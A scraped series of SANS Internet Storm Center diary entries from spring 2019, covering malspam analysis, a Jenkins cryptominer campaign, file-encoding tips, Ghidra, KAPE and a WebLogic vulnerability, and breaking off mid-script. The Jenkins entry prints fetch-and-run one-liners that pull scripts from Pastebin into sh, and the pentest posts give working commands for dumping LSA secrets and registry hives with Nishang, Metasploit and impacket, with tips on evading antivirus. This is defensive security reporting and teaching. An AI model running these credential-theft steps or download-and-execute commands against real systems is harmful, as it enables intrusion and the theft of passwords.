SANS Internet Storm Center - Cooperative Cyber Security Monitor
May 8, 2019

Email roulette, May 2019, (Wed, May 8th)


For today's diary I play a game of email roulette.  My version of email roulette is picking a recent item of malicious spam (malspam), running the associated email attachment in a live sandbox, and identifying the malware.  I acquired a recent malspam example through VirusTotal (VT) Intelligence.  Let's see what the roulette wheel gives us today!

Searching for malspam attachments in VT Intelligence

VT Intelligence is a subscription service, and from what I understand, it's fairly expensive.  Fortunately I have access through my employer.  In the VT Intelligence search window, I used the following parameters:

tag:attachment fs:2019-05-07+ p:3+

This returned anything tagged as an email attachment, first seen on or after 2019-05-07, with at least 3 vendors identifying an item as malicious.  After the results appeared, I sorted by the most recent submissions.

Shown above:  Searching and sorting in the VT Intelligence portal.

Shown above:  Results sorted by most recent at the time of my search.

The three most recent results I saw were 7-zip archives (.7z files).  The file names did not use plain ASCII characters; they were base64-encoded UTF-8 strings, using the format name:"=?utf-8?B?[base64 string]?="
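A file name in that encoded-word format can be decoded with Python's standard email module. A quick sketch (the Korean string below is a hypothetical example, not one of the actual attachment names):

```python
from email.header import decode_header

def decode_attachment_name(raw):
    """Decode a MIME encoded-word file name such as =?utf-8?B?...?=."""
    parts = decode_header(raw)
    return "".join(
        chunk.decode(charset or "ascii") if isinstance(chunk, bytes) else chunk
        for chunk, charset in parts
    )

# Hypothetical example: base64 of the UTF-8 bytes for a Korean string
name = decode_attachment_name("=?utf-8?B?7ZWc6rWt7Ja0?=")
```

Plain (unencoded) names pass through `decode_header` unchanged, so the same helper works on both.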

I picked the most recent result and selected the relations tab, which revealed the associated malspam.  Then I retrieved that email from VT Intelligence.

Shown above:  Pivoting on the attachment to find its parent email.

Shown above:  The email opened in Thunderbird on a Windows 7 host.

The attached 7-zip archive contained 3 files with different names, but they all had the same file hash, so they were the same malware.  I extracted them and ran one on a vulnerable Windows host.  The result was a Gandcrab ransomware infection.

Shown above:  Encrypted files and the ransom note on my infected Windows host.


The following are indicators associated with this infection:

SHA256 hash: 39f97e750a8ebcc68a5392584c9fd8edc934e978d6495d3ae430cb7ee3275ffe

  • File size: 157,810 bytes
  • File description: Example of Korean malspam (.eml file) pushing Gandcrab

SHA256 hash: 5444841becddce7ef2601752df63db2a9d067d46a359d8b0288da2ebf494ff41

  • File size: 112,792 bytes
  • File description: 7-zip archive (.7z file) attached to Korean malspam

SHA256 hash: df53498804b4e7dbfb884a91df7f8b371de90d6908640886f929528f1d6bd0cc

  • File size: 173,568 bytes
  • File description: Gandcrab executables (.exe files) extracted from the above .7z archive
  • Any.Run sandbox analysis

Final words

This round of email roulette gave us a Gandcrab ransomware infection.  What type of malware might I find next?  Perhaps we'll know when I try this again next month for another diary.

Brad Duncan
brad [at]

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
May 8, 2019

Vulnerable Apache Jenkins exploited in the wild, (Tue, May 7th)

An ongoing malicious campaign is looking for vulnerable Apache Jenkins installations to deploy a Monero cryptominer. The dropper uses sophisticated techniques to hide its presence on the system, to move laterally and to look for new victims on the internet. It also downloads and runs the miner software – of course.

The exploited vulnerability, CVE-2018-1000861 [1], was published in December 2018. It affects the Stapler web framework used by Jenkins 2.153 and earlier. It may allow attackers to invoke methods on Java objects by accessing crafted URLs.

Looking for publicly available exploits for this vulnerability, I could find a detailed proof of concept published early March this year.

After analyzing the threat which attacked one of my honeypots, I created the diagram shown in the picture below. Follow the numbers in blue to understand each step.

Vulnerability Exploitation

In the picture below, you can see the exploitation occurring. 

Notice that there is a base64 encoded content piped to bash for execution. Decoding this content, it was possible to see that this campaign is using Pastebin as the C2:

(curl -fsSL hxxps://pastebin[.]com/raw/wDBa7jCQ||wget -q -O- hxxps://pastebin[.]com/raw/wDBa7jCQ)|sh

The content of the paste ‘wDBa7jCQ’ is no longer available, but it was another one-liner fetching a second paste:

(curl -fsSL hxxps://pastebin[.]com/raw/D8E71JBJ||wget -q -O- hxxps://pastebin[.]com/raw/D8E71JBJ)|sed 's/\r//'|sh

The content of the ‘D8E71JBJ’ paste is also no longer available, but it was the shell script shown in the following images.

The Dropper

The dropper, named “Kerberods” (not to be confused with the “Kerberos” protocol), caught my attention due to the way it is packed and the way it acts if it has ‘root’ privileges on the machine.

After analyzing the binary, I could see that the packer used was a custom version of ‘UPX’. UPX is open-source software, and there are many ways it can be modified to make a file hard to unpack with the regular UPX version. There is a great presentation on this subject by @unixfreaxjp [2] called ‘Unpacking the non-unpackable’ which shows different ways to fix ELF headers in order to unpack such files.

Fortunately, in this case, the UPX customizations involved just the modification of the magic constant UPX_MAGIC_LE32 from 'UPX' to three other letters. Thus, after reverting those bytes to 'UPX' in the different parts of the binary, it was possible to unpack it with the regular version of UPX.
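Since only the three magic letters were changed, the repair can be scripted. A minimal sketch, where b"XYZ" stands in for the attacker's replacement letters (the real ones aren't given here):

```python
def restore_upx_magic(data: bytes, fake_magic: bytes) -> bytes:
    """Restore a tampered UPX magic so the stock `upx -d` recognizes the file.

    Assumes the packer only swapped the three letters of the "UPX!" marker
    (UPX_MAGIC_LE32) for another three bytes, as in the sample discussed above.
    """
    # The marker appears in several places in the binary; replace all of them.
    return data.replace(fake_magic + b"!", b"UPX!")

patched = restore_upx_magic(b"\x7fELF\x00XYZ!data XYZ!", b"XYZ")
```

After patching, the file can be handed to the unmodified UPX build for decompression.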

The Glibc hooks

The other interesting part is the way ‘Kerberods’ acts to persist and hide itself if it has root privileges on the machine.

If that is the case, it drops, compiles and loads a library into the operating system that hooks different functions of Glibc to modify their behavior. In other words, it acts like a rootkit.

In the image below, it is possible to see that the function ‘open’ now checks for certain strings in the ‘pathname’ and behaves differently when they match. The intention is to prevent anyone (including root) from opening the binary ‘khugepageds’ (which is the cryptominer), the ‘’ file that loads the malicious library, and the library ‘’ itself.


Another hook, to show one more example, hides the network connection to the private mining pool and the scan for open Redis servers, as seen in the image below.


Indicators of Compromise (IOCs)



Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
May 7, 2019

ISC Stormcast For Tuesday, May 7th 2019, (Tue, May 7th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
May 6, 2019

Text and T<NUL>e<NUL>x<NUL>t<NUL>, (Mon, May 6th)

I gave a few tips over the last weeks to help friends with processing files. Turned out that each time, UNICODE was involved.

Xavier had an issue with a malicious UDF file. I took a look with a binary editor:

The first bytes, FF FE, reminded me of a BOM: a Byte Order Mark. FF FE or FE FF can be found at the start of UTF-16 text files. It indicates the endianness: little endian (screenshot) or big endian.
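Checking for a BOM programmatically is straightforward with the constants in Python's stdlib codecs module. A small sketch (note the UTF-32 BOMs must be tested before UTF-16, since FF FE 00 00 starts with FF FE):

```python
import codecs

def bom_info(path):
    """Report the BOM, if any, at the start of a file."""
    with open(path, "rb") as f:
        start = f.read(4)
    # UTF-32 checks must come first: BOM_UTF32_LE (FF FE 00 00)
    # begins with the same two bytes as BOM_UTF16_LE (FF FE).
    if start.startswith(codecs.BOM_UTF32_LE):
        return "UTF-32 little endian"
    if start.startswith(codecs.BOM_UTF32_BE):
        return "UTF-32 big endian"
    if start.startswith(codecs.BOM_UTF16_LE):
        return "UTF-16 little endian"
    if start.startswith(codecs.BOM_UTF16_BE):
        return "UTF-16 big endian"
    if start.startswith(codecs.BOM_UTF8):
        return "UTF-8"
    return "no BOM"
```

This mirrors what the file command does for the samples discussed in this diary.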

Command file confirmed the endianness:

The fact that it contains just null bytes is unusual, but then again, this is actually not a text file, but a UDF file that was probably opened and saved with a text editor.

Another friend had a problem getting an XML file parsed by a SIEM. It threw an unusual, obscure error. Here too, it turned out that the file was UNICODE, while the SIEM expected an ASCII file.

When opening text files with an editor, it's often not trivial to determine the encoding of the file. And not everyone is comfortable using a hexadecimal editor.

If you want a command-line tool, I recommend the file command.

For a GUI tool on Windows, you can use the free text editor Notepad++.

It displays the encoding of the displayed file in its status bar:

“UCS-2 LE BOM” tells us that the file contains a BOM and is little-endian UCS-2 (an ISO standard equivalent to UNICODE and the basis for UTF-16). And we get bonus information: the line separator is carriage return / linefeed (CR LF). This was something Xavier had to deal with too.

This editor can of course convert encodings:


Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
May 6, 2019

ISC Stormcast For Monday, May 6th 2019, (Sun, May 5th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
May 3, 2019

A few Ghidra tips for IDA users, part 3 - conversion, labels, and comments, (Fri, May 3rd)

In this entry in my series, I'll look at a few more of the features I regularly use in IDA and how to accomplish the same in Ghidra.

The first one is simple conversion. In this case, hex to ASCII characters (classic stack strings stuff that we cover in Day 5 of FOR610). I miss IDA's 'R' key mapping, but that is currently taken by View/Edit References From. You can change that or create your own key mapping, Ctrl-Alt-R isn't currently taken, so that's what I use. Just like in IDA, you can right-click on the value, but then you have to choose Convert and then Char from the submenu.

Another of the features I use regularly, is renaming arguments, variables, and functions as I begin to figure out their purposes. In IDA, this is the 'N' key, in Ghidra, it is the 'L' key for Label. It works exactly like in IDA. In the screenshot below, you'll see it in the right-click menu.

And below is the actual dialog to do the renaming.

And, the last functionality I want to cover in this post is comments. There are 4 (well, 5) types of comments that you can create with Ghidra. Pre-comments which will appear above the instruction where you place it, post-comments which appear below, EOL (and repeatable) comments at the end of the line, and Plate comments, which change the generic "Function" comment at the top of the function. I actually like some of the additions, especially the plate comment which can be used to fill in info on what I've discovered about the functionality of the function in question.

And here are examples of each

I've got at least one more post in this series, probably next week. As with the others, if you have any tips, comments, corrections, etc. let me know via our contact page, e-mail, or via the comments below. Until next time,...

Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
May 3, 2019

ISC Stormcast For Friday, May 3rd 2019, (Fri, May 3rd)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
May 2, 2019

Another Day, Another Suspicious UDF File, (Wed, May 1st)

In my last diary, I explained that I found a malicious UDF image used to deliver a piece of malware[1]. After this, I created a YARA rule on VT to try to spot more UDF files in the wild. It seems like the tool ImgBurn is the attacker's best friend to generate such malicious images. To find more UDF images, I used the following very simple YARA rule:

rule ImgBurnedFile {
    strings:
        $s1 = "ImgBurn v2" nocase wide
    condition:
        all of them and new_file
}

I received some false positive hits but one file looked particularly interesting. In YARA rules, when you specify the keyword “wide”, YARA will search for strings encoded with two bytes per character (read: Unicode).

The file that I spotted was indeed in Unicode text and scored "0" on VT (SHA256: bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f)[2]

$ file bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f.bad
bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f.bad: Unicode text, UTF-32, little-endian

I decoded the file with the iconv tool and got an ISO9660 image:

$ iconv -c -f UTF-16LE -t ASCII bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f.bad \
  > bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded.bad
$ file bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded.bad
bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded.bad: ISO 9660 CD-ROM filesystem data 'NEW_FOLDER'
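The iconv step can be mirrored in Python. A sketch under the assumption that each UTF-16LE code unit encodes one raw byte of the original image (latin-1 keeps byte values 0-255, so it is slightly more permissive than -t ASCII):

```python
def utf16le_to_bytes(data: bytes) -> bytes:
    """Interpret UTF-16LE "text" as raw bytes, one byte per code unit.

    Code points above 255 are silently dropped, similar to `iconv -c`.
    """
    text = data.decode("utf-16-le", errors="ignore")
    if text.startswith("\ufeff"):      # strip a BOM if present
        text = text[1:]
    return text.encode("latin-1", errors="ignore")
```

For example, the ISO 9660 signature 'CD001' stored as UTF-16LE decodes back to its original five bytes.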

But it was impossible to mount the image:

$ mount -t iso9660 -o loop \
  bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded.bad /mnt/udf
mount: /mnt/udf: wrong fs type, bad option, bad superblock on /dev/loop3, missing codepage or helper program, or other error.

While discussing this file with Didier, he found that the file had also been converted from UNIX to DOS format (with 0x0A’s replaced by 0x0D0x0A’s). I found 52 occurrences of ‘\r\n’ in the file:

$ grep --binary "\r\n" -c bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded.bad
52

I converted them using dos2unix:

$ dos2unix -f -n bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded.bad \
  bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded-unix.bad
dos2unix: converting file bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded.bad to file
bef7985aa8bda67e628de4100ce5d7f1e26754199578d7fc72ddbe00f3427c9f-decoded-unix.bad in Unix format...

Once again, no luck: the image could not be mounted. As Didier likes to work more with Windows tools, he decoded the file on his side with UltraEdit and successfully mounted the image via the tool UltraISO. Finally, it was possible to extract the PE file ‘SHIPMENT.EXE’ (SHA256: 22238c4b926d3c96d686377d480e5371d22a5839367db687922242c45c8321dc). The PE file is corrupted, probably due to the aggressive search/replace of all ‘\r\n’ in the file. The PE file is a compiled AutoIT script. I uploaded the sample myself to VT and it got a score of 11/71[3].

The next question is: Why was the initial file encoded? Is it meant to be downloaded as a second stage in a stealthy way? Stage one would then have to decode it properly (but how, without corrupting the PE file?). Have you already seen the same kind of malicious UDF images? Please share!


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
May 2, 2019

ISC Stormcast For Thursday, May 2nd 2019, (Thu, May 2nd)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
May 1, 2019

VBA Office Document: Which Version?, (Wed, May 1st)

In some cases, like malicious Word documents without VBA source code, you want to know which version of Office was used to create the VBA macros, because compiled VBA macros don't run on all versions.

This information can be found inside the _VBA_PROJECT stream:

The 3rd and 4th bytes in this stream are a little endian word, whose value indicates the version of Office that was used to create the VBA code. This is all documented by Microsoft, except for the field values themselves.
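Reading that word with Python's struct module is straightforward. A minimal sketch (the sample bytes below are an illustrative stream header, not taken from a real document):

```python
import struct

def vba_project_version(stream_bytes: bytes) -> int:
    """Return the Office version word from a _VBA_PROJECT stream.

    The 3rd and 4th bytes (offset 2) are a little-endian 16-bit word.
    """
    return struct.unpack_from("<H", stream_bytes, 2)[0]

# Illustrative header: version word 0x0097 (Office 2010 in the list below)
version = vba_project_version(b"\xcc\x61\x97\x00" + b"\x00" * 12)
```

The returned value can then be looked up in the version list that follows.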

Here is a list I compiled for different Office versions (Windows):

Office Version    32-bit    64-bit
95                0x0004    N/A
XP                0x0073    N/A
2003              0x0079    N/A
2007              0x0085    N/A
2010              0x0097    0x0097
2013              0x00A3    0x00A6
2016              0x00AF    0x00B2
2019              0x00AF    0x00B2
If you have other info for other versions, please post a comment or submit a sample.

Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
May 1, 2019

ISC Stormcast For Wednesday, May 1st 2019, (Wed, May 1st)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
April 30, 2019

Introduction to KAPE, (Tue, Apr 30th)


In this diary, I will talk about KAPE by SANS Instructor Eric Zimmerman. 


What is KAPE?

Kroll Artifact Parser and Extractor (KAPE) is primarily a triage program that will target a device or storage location, find the most forensically relevant artifacts (based on your needs), and parse them within a few minutes.

Because of its speed, KAPE allows investigators to find and prioritize the more critical systems to their case. Additionally, KAPE can be used to collect the most critical artifacts prior to the start of the imaging process.

While the imaging completes, the data generated by KAPE can be reviewed for leads, building timelines, etc.


KAPE can be downloaded from the following link:

Once you download and unzip KAPE you can find two executables:

One is kape.exe which is the command line version and the other one is gkape.exe which is the GUI version.


For this diary, I am going to use the GUI version. Like most forensic acquisition tools, KAPE needs administrative privileges to do its job.

To collect data, first click the “Use Target Options” checkbox, then choose what you want to collect. In this example, I am going to select the C drive as the target source and choose the following: “EvidenceOfExecution”, “RegistryHives”, and “FileSystem”.

This step will just collect the evidence files. To parse these files, you need to choose the appropriate modules. For this example, I will choose “JLECmd, MFTECmd_$MFT, RegRipper-sam and RegRipper-security”.

Unfortunately, some of the modules do not come with KAPE by default. One of these is reg.exe. But that's not the end of the world: just go to kape\modules and open the YAML file of the specific module. In this example, I am going to open RegRipper-sam.mkape and check which additional executable it needs.


Now just follow the instructions in the file. You need to specify the output directory for both Targets and Modules. Then go back to gkape and click “Execute”. Or, if you would like to run it from a command line, you can copy the command-line version of the same selection from the “Current command line” section.



(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
April 30, 2019

ISC Stormcast For Tuesday, April 30th 2019, (Tue, Apr 30th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
April 29, 2019

Update about Weblogic CVE-2019-2725 (Exploits Used in the Wild, Patch Status), (Sun, Apr 28th)

Late last week, news emerged about a potential new vulnerability in WebLogic [1]. The vulnerability was first reported to the Chinese National Vulnerability Database (CNVD). A proof of concept exploit labeled "CVE-2018-2628" was made available at the same time. The name of the exploit caused some confusion.  CVE-2018-2628 refers to a WebLogic vulnerability that was fixed last year in Oracle's April critical patch update.

On Friday, Oracle released a statement clarifying the issue [2]. The vulnerability is new and was not patched by any critical patch update, including the last one released this month. Oracle assigned CVE-2019-2725 to identify this new vulnerability. On Friday, Oracle released a patch for WebLogic 10.3.6. A patch for WebLogic 12.1.3 should be released on Monday (today) April 29th.

We already see active exploits of the vulnerability to install crypto coin miners in our honeypot. The proof of concept exploit released last week allows the trivial install of a shell on a WebLogic server. However, remember that our honeypots are not "special" in the sense that they are only seeing random exploits. We have to assume that at the same time, targeted attacks are underway to wreak more havoc.

[pcap file of some test runs of one of the exploits against a vulnerable server]

If you find a vulnerable server in your environment, assume that it has been compromised. Do not just remove the coin miner. There may have been additional attacks.

CVE-2019-2725 is yet another deserializing vulnerability affecting WebLogic. WebLogic's design makes it particularly prone to these types of vulnerabilities. Do not expose WebLogic to the Internet if you can help it. I doubt that this was the last such vulnerability.

A quick look at the patch shows that it includes the "validate" function that was added and later enhanced in response to similar flaws. But a quick look didn't show any obvious additions. NSFocus had a great discussion of this function following prior vulnerabilities [3]. 

On our test server, we only saw logs indicating an attack if the script the attacker attempted to execute failed. For example, in the sample below, the attacker tried to execute "wget", but "wget" was not installed on the system:

####<Apr 28, 2019 10:47:02 PM UTC> <Error> <HTTP> <0aa00a61ebfc> <AdminServer> <[ACTIVE] ExecuteThread: '0' for queue: 'weblogic.kernel.Default (self-tuning)'> <<WLS Kernel>> <> <> <1556491622309> <BEA-101019> <[ServletContext@2141998910[app:bea_wls_internal module:bea_wls_internal.war path:/bea_wls_internal spec-version:null]] Servlet failed with IOException Cannot run program "wget": error=2, No such file or directory

I will try to update this post on Monday as we learn more.

(thanks to our handler Renato Marinho for significantly contributing to this post)


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
April 29, 2019

ISC Stormcast For Monday, April 29th 2019, (Mon, Apr 29th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
April 27, 2019

Quick Tip for Dissecting CVE-2017-11882 Exploits, (Sat, Apr 27th)

In diary entry "Dissecting a CVE-2017-11882 Exploit" I analyze an equation editor exploit. These kinds of exploits have become prevalent; I often see malware exploiting this vulnerability.

In my diary entry, I use my tool to dissect the exploit using a long string of format specifiers. This is not practical if you have to do this often:

That's why I have now added a library of format strings to my tool, eqn1 is the format string to use for this exploit:

So instead of typing "-f "<HIHIIIIIBBBBBBBBBB40s..." ", you can now just type: "-f name=eqn1".
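Those format specifiers appear to follow Python's struct mini-language (< = little-endian, H = unsigned 16-bit, I = unsigned 32-bit, B = unsigned byte, 40s = 40 raw bytes). A tiny illustration with a made-up 4-byte header, not the actual equation editor layout:

```python
import struct

# Hypothetical header: two little-endian unsigned 16-bit words,
# in the same "<HH..." notation as the long format specifier above.
fmt = "<HH"
buf = b"\x1c\x00\x02\x00"
size, version = struct.unpack(fmt, buf)
```

A long specifier like "<HIHIIIIIBBBBBBBBBB40s" works the same way, just with more fields per record.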


Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
April 26, 2019

Pillaging Passwords from Service Accounts, (Fri, Apr 26th)

In our "pretend pentest" that we've been running these last few days, we've now got all the domain admins listed, all the service accounts found and listed, and the intersection of those two things - the service accounts that are either local admin or domain admin.
So what's the obvious next step?  Let's recover the passwords for those target service accounts!  Because once we have the full credentials, we have admin rights whose use no SIEM or systems admin will be tracking - these accounts are almost universally ignored, since they log in every time those services start (say, during a system restart).  So if this is, for instance, a service account with domain or local admin rights that's on every server and workstation, you are now "better than domain admin".  You have all the rights, but no system controls are watching you!

Let's get on with the job at hand.

First of all, credentials for service accounts are stored in the local registry, as what's called "LSA Secrets", under the registry key HKEY_LOCAL_MACHINE\Security\Policy\Secrets.  Because the service needs to read the actual password to log in as the service account, that password is in the registry in clear text.  Yup, you read that right - this is why service accounts are such a great target.  LSA Secrets are well protected, however: you can't just fire up regedt32 and read them - only the SYSTEM account has rights.  So you need ... yes, some PowerShell!  Not only that, many of today's tools are based on some PowerShell posted way back in the day on!
(Thanks TrueSec!!  In fact, thanks from all of us! )

Or if you're not in the mood for PowerShell, you could use some Python tools, or Metasploit or Mimikatz works too - choose your own adventure!  Often you'll need to try a few different methods, and then maybe wrap one in some "AV evasion" code to make it work for you, but the results are worth it in the end!!


Those original scripts from Microsoft don't work on modern hosts with any patches applied, but of course there's a toolkit that has improved on these scripts over time.  I generally use Nishang for the PowerShell-centric "I'm on the box" approach to LSA Secret recovery.
Nishang can run locally on the targeted Windows host, or you can of course use PSRemoting.  The problem with this tool is that if there's an AV product in play anywhere in the chain, it will very likely have a problem with you running Nishang.  In fact, even downloading it on a Windows host with a default install (i.e. with Windows 10's Defender in play) can be a problem.

Anyway, once it's installed, the execution is pretty straightforward:

> Import-Module .\nishang\Gather\Get-LSASecret.ps1
> Import-Module ./nishang/Escalation/Enable-DuplicateToken.ps1
> Enable-DuplicateToken
> Get-LSASecret

Name                                Account        Secret                ComputerName
----                                -------        ------                ------------
_SC_Service Name Being Targeted    .\SVCAccount    Passw0rd123           ComputerName


Metasploit of course has a module for this. You can run it locally or (more likely) remotely.  The module is post/windows/gather/lsa_secrets.
Because endpoint protection programs tend to focus so much on Metasploit (which of course tells us just how good this tool is), you need to be careful where and how you run it if the goal is to get this job done with any degree of stealth.  You'll want to put some up-front work into evading whatever your client has for AV - this work pays off in all kinds of ways if the pentest you're running is longer than a few days.  This method does a great job though, even though (depending on the module you're running) it'll tend to scream at the AV solutions "Look! Look at me! I'm running Metasploit!"
The Metasploit method is as simple as "run post/windows/gather/lsa_secrets".

For me the most attractive thing about using Metasploit is that you can script the exploits.  So if you need to, you can run 4-5-6 exploits against hundreds of machines in one go.

Dumping LSASS

You can dump the LSASS process memory and recover service passwords (and a ton of other stuff too) from that, but that becomes less and less reliable over time as Microsoft puts more fences and protections around LSASS.  I've never had to go this way on a real engagement.  The easier method is to run the MimiKatz PowerShell Module and just watch the magic happen.  That is if you put the work into evasion against your endpoint protection solution to allow MimiKatz to run.


Impacket makes a great little python based tool to accomplish the same thing.  This is my first, go-to, it almost always works method - mainly because all you run on the target host is standard windows commands, then the rest of the attack is on the attacker's host.  This makes it the least likely of these methods to trigger any AV alerts or other security measures.

First, from the local host we dump the 3 registry hives that are in play:

reg save hklm\sam sam.out

reg save hklm\security security.out

reg save hklm\system system.out

Now take those files and get thee to your Kali VM!   If you don't have impacket installed yet (it's not in the default install), there's no time like the present.  To install:

$ sudo apt-get install python-dev python-pip -y

$ pip install --upgrade pip

$ sudo pip install pycrypto pyasn1 pyOpenSSL ldapdomaindump

$ git clone

$ cd impacket

$ sudo python install

(in most cases you don't need all of those pre-reqs, I put them all in just in case).  Now you're good to go:

impacket-secretsdump -sam ./sam.out -security ./security.out -system ./system.out LOCAL

(you'll find a bunch of other interesting security stuff in this tool's output - all the local account password hashes for one thing!)

At the bottom of the output, you'll see what we're looking for, the locally stored password for that service account!!  In this case I put a "fake" account on my SFTP server service (Solarwinds SFTP doesn't have a service account by default).

That's it - no fuss, no muss, and best of all, nothing to trigger AV or any similar "endpoint next-gen machine-learning AI user behavioural analysis security" product on the target host.


Other tools like CrackMapExec do a good job as well - I haven't used that one specifically yet, really the impacket method has done the job for me so far.  While I tend to have a "try one or two new things" or "write one new tool" rule for each test, I haven't gotten around to using any other tools for this particular thing.  

Do you use a different tool to dump service passwords?  Does your tool collect more useful information than just that particular thing?  Or maybe you've got a cool AV evasion that relates to this?   Please, use our comment form and share your experiences on this!

Rob VandenBrink

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
April 26, 2019

ISC Stormcast For Friday, April 26th 2019, (Fri, Apr 26th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
April 25, 2019

Service Accounts Redux - Collecting Service Accounts with PowerShell, (Thu, Apr 25th)

Back in 2015 I wrote up a "find the service accounts" story  - (yes, it really has been that long).  The approach I wrote up then used WMIC.  Those scripts saw a lot of use back in the day, but don't reflect the fastest or most efficient way to collect this information - I thought today was a good day to cover how to do this much quicker in PowerShell.

Why would you need to do this?  In a penetration test or an internal security assessment, you normally want to enumerate any services that don't use the built-in Microsoft Service Accounts.  This is because actual service accounts almost never see a password change, and almost always are given local administrator or domain administrator rights.  Mainly because if you're going to be a software vendor that's dumb enough to still use Windows XP era service accounts, you might as well go all the way and make those accounts Domain Admin for any malware that wants to collect those passwords (stay tuned, we'll be doing this tomorrow!).  Microsoft's current recommended approach is to use the various built-in service accounts for services.  These don't have passwords, and can't be used for lateral movement to other workstations or servers.

That being said, let's pretend to be malware and collect those service accounts across an AD domain!

$targets = Get-ADComputer -Filter * -Property DNSHostName
$vallist = @()
$i = 1
$count = $targets.count

foreach ($targethost in $targets) {
  write-host $i of $count - $targethost.DNSHostName
  $i++
  if (Test-Connection -ComputerName $targethost.DNSHostName -count 2 -Quiet) {
    $vallist += Get-WmiObject Win32_service -Computer $targethost.DNSHostName | select-object systemname, displayname, startname, state
  }
}
$vallist | export-csv all-services.csv

A few things to discuss.
First of all, $i, $count, and the "write-host" line are there just so that if you have several thousand hosts to enumerate, you can ensure that your script isn't hung, and how far along it might be at any given time.

The "Test-connection" check is there so that you don't wait several seconds trying to connect up to remote hosts that might not be up.

Also, this can only enumerate hosts that are actually up and accept a connection - you likely want to run this script during the day.  If you start your script and see that it's going to take longer than a business day to complete (for a larger domain for instance), you might want to pause it towards the end of the business day, and restart it the next morning after everyone is back at their desks.

OK - so now that the script has run, what have we found?  What we have is the list of **all** services that are installed on all hosts in the domain, along with the account that's used to start the service.

This is great for system admins looking for one thing or another, but for most security purposes you don't want the ones that are using the built-in service accounts.  To filter those out, you want to remove any service that is started by these accounts:

  • NT AUTHORITY\LocalService
  • LocalSystem
  • NT AUTHORITY\NetworkService
  • or an empty field

To do this, add these lines to the bottom of your script:

$filtlist = @("LocalService", "LocalSystem", "NetworkService", "NT AUTHORITY\LocalService", "NT AUTHORITY\NetworkService", "NT AUTHORITY\NETWORK SERVICE", "NT AUTHORITY\LOCAL SERVICE")
$TargetServices = $vallist | Where-Object { $filtlist -notcontains $_.startname }

$TargetServices | export-csv bad-services.csv

Things to note in this bit of code?  The "-contains" and "-notcontains" operators are case-insensitive, so upper / lower case doesn't matter in your filter.
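A quick check at a PowerShell prompt shows this in action (the account names below are just sample values):

```powershell
# -contains / -notcontains compare case-insensitively by default
$list = @("LocalService", "LocalSystem", "NetworkService")
$list -contains "LOCALSYSTEM"        # True - case doesn't matter
$list -notcontains "localservice"    # False - it still matches "LocalService"
```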

So, what can we do with this list if we're attacking a domain?  We can use the domain admin and local admin lists that we sleuthed yesterday, and see which of these service accounts are domain admins!

Let's take that list of $TargetServices, and list the offending accounts:

$TargetSVCAccounts = $TargetServices.startname | Sort-Object -Unique


In many domains you'll also see service accounts that are local to the machine being enumerated.  Often those have local admin rights, and often that same (local admin) service userid and password is used on all workstations, and frequently on all servers too, which gets you almost the same access as domain admin rights (oops).

Normally the lists that come out of these scripts are short enough that I can compare them by eye to the list of local and domain admins we collected in yesterday's story.  But if you have one of those unfortunate domains where dozens or hundreds of people have domain or local admin rights, you might want to add a bit more code:

$SVCDomAdmins = @()
$Admins = $DomainAdmins.SAMAccountName.toupper()

Foreach ($Acct in $TargetSVCAccounts) {
    # strip the domain prefix / suffix ("AD\" and "@AD.INT" match the example domain)
    $a = $Acct.toUpper() -replace '^AD\\','' -replace '@AD\.INT$',''
    if ($Admins.Contains($a)) {$SVCDomAdmins += $a}
}

$SVCDomAdmins | Sort-Object -Unique | export-csv Service-DomainAdmins.csv

To find Service Accounts that are local admins, it's the exact same code, but replace line 2 with "$Admins += $localadmins.AdminID.toupper()"
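Spelled out in full, that local-admin variant looks something like the sketch below.  The $localadmins list and its AdminID column come from yesterday's collection script, and the two sample accounts here are hypothetical - adjust the names (and the AD\ / @AD.INT domain strings) to match your own environment:

```powershell
# Hypothetical sample data - in the real script, $localadmins comes from
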